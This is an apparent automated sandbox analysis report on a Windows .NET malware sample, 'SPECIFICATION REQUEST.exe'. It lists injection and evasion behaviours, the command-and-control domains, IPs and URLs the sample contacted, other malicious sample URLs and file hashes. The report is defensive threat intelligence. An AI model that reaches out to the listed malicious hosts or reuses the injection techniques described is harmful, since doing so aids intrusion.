            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 344818 Sample: SPECIFICATION REQUEST.exe Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 6 other signatures 2->43 10 SPECIFICATION REQUEST.exe 3 2->10         started        process3 file4 27 C:\Users\...\SPECIFICATION REQUEST.exe.log, ASCII 10->27 dropped 13 SPECIFICATION REQUEST.exe 10->13         started        process5 signatures6 51 Modifies the context of a thread in another process (thread injection) 13->51 53 Maps a DLL or memory area into another process 13->53 55 Sample uses process hollowing technique 13->55 57 Queues an APC in another process (thread injection) 13->57 16 explorer.exe 13->16 injected process7 dnsIp8 29 toprestau.com 64.92.125.40, 49733, 80 MASSIVE-NETWORKSUS United States 16->29 31 bistrolartichaut.com 34.102.136.180, 49735, 80 GOOGLEUS United States 16->31 33 6 other IPs or domains 16->33 35 System process connects to network (likely due to code injection or exploit) 16->35 20 wlanext.exe 16->20         started        signatures9 process10 signatures11 45 Modifies the context of a thread in another process (thread injection) 20->45 47 Maps a DLL or memory area into another process 20->47 49 Tries to detect virtualization through RDTSC time measurements 20->49 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SPECIFICATION REQUEST.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.SPECIFICATION REQUEST.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.bistrolartichaut.com/gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.firstbyphone.com/gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW00%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.toprestau.com/gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW00%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.firstbyphone.com
            194.245.148.189
            truetrue
              unknown
              bistrolartichaut.com
              34.102.136.180
              truetrue
                unknown
                toprestau.com
                64.92.125.40
                truetrue
                  unknown
                  www.bistrolartichaut.com
                  unknown
                  unknowntrue
                    unknown
                    www.toprestau.com
                    unknown
                    unknowntrue
                      unknown
                      www.douyzqdsgl.com
                      unknown
                      unknowntrue
                        unknown
                        www.xn--fllessang-g3a.com
                        unknown
                        unknowntrue
                          unknown
                          www.planterboxgardener.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.bistrolartichaut.com/gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKTtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.firstbyphone.com/gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.toprestau.com/gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0true
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.comexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.tiro.comexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.goodfont.co.krexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.carterandcone.comlexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fonts.comexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.sandoll.co.krexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSPECIFICATION REQUEST.exe, 00000000.00000002.234532898.00000000029B1000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sakkal.comexplorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  194.245.148.189
                                                  unknownGermany
                                                  5517CSLDEtrue
                                                  64.92.125.40
                                                  unknownUnited States
                                                  21777MASSIVE-NETWORKSUStrue
                                                  34.102.136.180
                                                  unknownUnited States
                                                  15169GOOGLEUStrue

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:344818
                                                  Start date:27.01.2021
                                                  Start time:07:57:13
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 10m 58s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:SPECIFICATION REQUEST.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:30
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@7/1@6/3
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 19.8% (good quality ratio 18.1%)
                                                  • Quality average: 74.1%
                                                  • Quality standard deviation: 30.4%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.139.144, 92.122.144.200, 51.104.139.180, 51.103.5.186, 20.54.26.129, 95.101.22.224, 95.101.22.216, 2.23.155.128, 2.23.155.153, 52.155.217.156
                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net
                                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344818/sample/SPECIFICATION REQUEST.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  07:58:03API Interceptor1x Sleep call for process: SPECIFICATION REQUEST.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  194.245.148.189New Vendor - Setup Form.exeGet hashmaliciousBrowse
                                                  • www.escapenet.cloud/rerx/?D48t=Q9ck5ers9BRLMlJf61o9XRLjiuyTqr/Oe/Tl6l+b5s2DMDIpsaq2BatzRWhA+8ZQikji&IbYdX4=Dxo0sPDXHVC4H
                                                  73proforma invoice.exeGet hashmaliciousBrowse
                                                  • www.pelikoodi.com/ga/
                                                  34.102.136.1800113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                  • www.inreachpt.com/gqx2/?FH=Z6A4l46h&LBbXpL=9/BKDbjWJTW8jFQit4UrkvSCkC6DC2Rftex5RF517dla63TUfiGzTVS9eU2a+MLpIdlY9g==
                                                  PAYMENT LIST .xlsxGet hashmaliciousBrowse
                                                  • www.kerifletcherrock.com/oean/?jvylC6k0=Opa2yxOMW+p6bOslAOO6h/1EkNB54ngFJAZHYsyvYxpw4UyGhwhjUO3aSMs8Sdr4Amozmg==&gnj80=CJBh7xO8zrtpcTq
                                                  quote20210126.exe.exeGet hashmaliciousBrowse
                                                  • www.ribbonredwhiteandblue.com/dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s
                                                  SecuriteInfo.com.Trojan.Packed2.42783.14936.exeGet hashmaliciousBrowse
                                                  • www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP
                                                  PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                  • www.worldwide-mt.com/kzd/
                                                  bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                  • www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV
                                                  xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                  • www.ricardoinman.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQV/txd+LHV0DSgDXQ==
                                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                                  • www.jikzo.com/c8so/?3ff87=Bcwq9mo1SLdxGMzaDRBSbVH3gidTK8xbNEF8M/tGLQ2aKWcuDQCQFtxR7k1oF3yRZXKc&uZWD=XPmPajepJ2gdvnZ
                                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                                  • www.simplifiedvirtualsolutions.com/oean/?MdLxlt=mKgmb7I6yODGcWmnOnDfCd0CfDEQGPBdVeZhKsaKMoR3Qh4v4CLN6oxN3p9trG3799qCow==&gnU4Pf=yZPLGZXHl
                                                  Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                  • www.kaiyuansu.pro/incn/?9r_PU=-ZQLEn&e2Jdlzf8=4y+UTKzAJ4dBlp/RYYS74WaP+qCjnKVRzK/jF/x906cXBmLcUo8gxmNUvdqUiR1QG2msPA==
                                                  winlog(1).exeGet hashmaliciousBrowse
                                                  • www.growingequity.fund/oean/?8pNhXv=yVML0zB0&u4XpH=VZAj6Grbo5w3dBd7w+9BSoe0Fg1VHX3dphJz9/egos9dVzX5qD6mqxE3tIZZ2ImCjS7epxmUBA==
                                                  win32.exeGet hashmaliciousBrowse
                                                  • www.findthatsmartphone.com/incn/?8pBP5p=/AA5bjKPiaWw22bzCdt7lqNbxAyyPpv3elVlM12b4Zuyr5w4xH0F6TIfefQNvJyZz9qG&L6Ah=2dSLFXghYtFd0
                                                  1-26.exeGet hashmaliciousBrowse
                                                  • www.catalogcardgames.net/bf3/?UXrxP8=0T3HW8l&URfXx=Sdh36sWiaQaHmuW5OuhNg2ZSKBobeXsq4DWTIDdmgtvI732RtscB8O3t4ssmBmGg4ghZ
                                                  Request.xlsxGet hashmaliciousBrowse
                                                  • www.cleverwares.com/c8so/?Rf=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==&LDHHp=z4D80PDX
                                                  INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                  • www.5050alberta.com/xle/?8pqhs=XuVPlIEgAAku+dXH+MR8cy20ZHkP0iJzlT7lKUj3PYBKa8v0bSmzSfHWFfmBCUSgIWFn2Q==&tDH=XRR8
                                                  RFQ.xlsxGet hashmaliciousBrowse
                                                  • www.blacknation.info/c8so/?pBU=HzuD_&gb24XB=6ATEh1s0NdZErsRPIUioXmvz20sSLCkN4f+QHjKAbluYenOJN9FSbPt8XJ2H+dMMf4Jp2Q==
                                                  New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                  • www.primeoneimplants.com/qjnt/?tB=TtdpPpppFvG&1bwhC=nh3Tl/oLs4HXZ5hiWyD3n36TA5+xQ+CwXb+KxfiJNOta6blp58Sj1H/LHtoCWuUTeWdwKg==
                                                  RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                  • www.harperandchloe.com/xle/?5jFlkJJh=FNtvxHF14RtgzuhKSaLd0lIzxL3LkdKZj/Q/Opos8UfLtbug0tkzhu0XdD0TouZ6I/qGUQ==&LR-T=vBK0GdQp
                                                  gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                  • www.ctfocbdwholesale.com/bw82/?W6=Rxta6xhtzzdBFDuy4SYKtO8XUaMinJcredo77YczPu8Lep1ecFiaWqXH8h2T5haNROfU&odeTY=cnxhAP6x
                                                  bgJPIZIYby.exeGet hashmaliciousBrowse
                                                  • www.engageautism.info/bw82/?GFND=n1L9MQk6NEQOasYlfxU4KXziLGivOllQbNtATfsC4RjAZctNbAJfQ2EIxV87fcKcU54A&Rlj=YVIX8Hyx

                                                  Domains

                                                  No context

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  GOOGLEUS0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  SIT-10295.exeGet hashmaliciousBrowse
                                                  • 108.177.119.109
                                                  PAYMENT LIST .xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  wno5UOP8TJ.exeGet hashmaliciousBrowse
                                                  • 8.8.8.8
                                                  quote20210126.exe.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  org.mozilla.firefox_2015785883.apkGet hashmaliciousBrowse
                                                  • 172.217.20.238
                                                  org.mozilla.firefox_2015785883.apkGet hashmaliciousBrowse
                                                  • 172.217.23.14
                                                  SecuriteInfo.com.Trojan.Packed2.42783.14936.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  4NoiNHCNoU.exeGet hashmaliciousBrowse
                                                  • 216.58.207.179
                                                  bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  eEXZHxdxFE.exeGet hashmaliciousBrowse
                                                  • 35.228.108.144
                                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  o3Z5sgjhEM.exeGet hashmaliciousBrowse
                                                  • 35.186.223.98
                                                  ltf94qhZ37.exeGet hashmaliciousBrowse
                                                  • 35.228.108.144
                                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  winlog(1).exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  win32.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  CSLDENew Vendor - Setup Form.exeGet hashmaliciousBrowse
                                                  • 194.245.148.189
                                                  48attachmen.exeGet hashmaliciousBrowse
                                                  • 159.25.16.112
                                                  59text.exeGet hashmaliciousBrowse
                                                  • 159.25.16.112
                                                  73proforma invoice.exeGet hashmaliciousBrowse
                                                  • 194.245.148.189
                                                  rma.htmlGet hashmaliciousBrowse
                                                  • 194.245.140.212

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SPECIFICATION REQUEST.exe.log
                                                  Process:C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1400
                                                  Entropy (8bit):5.344635889251176
                                                  Encrypted:false
                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEg:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHV
                                                  MD5:394E646B019FF472CE37EE76A647A27F
                                                  SHA1:BD5872D88EE9CD2299B5F0E462C53D9E7040D6DA
                                                  SHA-256:2295A0B1F6ACD75FB5D038ADE65725EDF3DDF076107AEA93E4A864E35974AE2A
                                                  SHA-512:7E95510C85262998AECC9A06A73A5BF6352304AF6EE143EC7E48A17473773F33A96A2F4146446444789B8BCC9B83372A227DC89C3D326A2E142BCA1E1A9B4809
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.646161478580307
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:SPECIFICATION REQUEST.exe
                                                  File size:939520
                                                  MD5:e7d7f8b02dd023f31b46e5bb265c7224
                                                  SHA1:95e91ec34debdc0e4817d90caca87897f4febe98
                                                  SHA256:fc534d33f183a321a447fef1fdef4c8a7fa78413cd15f93df13a39f0a8b9b2fe
                                                  SHA512:7c773bbcae8233a7fda03b794adc1ec19ce55dcfb6226fcc1c22b149b9332207564ab1ef10b336fa001dcc65844ad1903c910ff65a1bd655350de3283e33e53f
                                                  SSDEEP:12288:Da1vFBy6byykqanLIpUrbxujgRzDNFC8YEIGKEbyX6/VwbN4+vtE+LtZ/NRMiWid:21vFBy6by7ngjgRVFjlIGnbnwqYTfV
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..J..........~h... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4e687e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6010E4EC [Wed Jan 27 03:58:36 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
